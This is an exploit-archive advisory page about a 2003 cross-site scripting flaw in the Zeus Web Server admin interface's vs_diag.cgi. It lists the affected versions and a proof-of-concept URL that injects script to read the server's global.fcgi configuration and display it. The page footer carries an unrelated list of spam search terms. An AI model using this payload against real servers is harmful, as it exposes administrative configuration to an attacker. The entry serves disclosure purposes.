about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Zeus Web Server Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability


Title Zeus Web Server Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability
Published 2003-05-29-12:00AM
Updated 2003-05-30-03:26PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability credited to Hugo "V?zquez" "Caram?s" <overclocking_a_la_abuela@hotmail.com>.
Vulnerable  Zeus Technologies Zeus Web Server 4.2 r2
Zeus Technologies Zeus Web Server 4.2
Zeus Technologies Zeus Web Server 4.1 r5
Zeus Technologies Zeus Web Server 4.1 r4
Zeus Technologies Zeus Web Server 4.1 r3
Zeus Technologies Zeus Web Server 4.1 r2
Zeus Technologies Zeus Web Server 4.1 r1
Zeus Technologies Zeus Web Server 4.1
Zeus Technologies Zeus Web Server 4.0
Not Vulnerable  
Code   The following proof of concept was provided:

http://<target>:9090/apps/web/vs_diag.cgi?server=&lt;script&gt;function%20pedo()
{var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")
&lt;/script&gt;
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 15:08:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Powered by php-nuke 2 news for C Nuclear tuning car Grandstrea united sta SAKKILA VI Wwwsex.xx guest book lostpasswo port 9787 news for c SAKKILA VI ivete ultavnc Karenasexy oneadmin.h how to run chsh www.992net maxcpm.inf 1.3.27 www.anxire news for c my sex tv maxcpm.inf www.nudepi www.lejins pop up nayantara news for c AXOM SEX mohit.gupt Sarah azha upb www.Wordse www.it197. joomla rem free india TAMIL+BLUE sexi pichr www.it197. 65505.com. mt Bank,co Www.sex18. oracle 9 maurizia lo562l oscpmmerce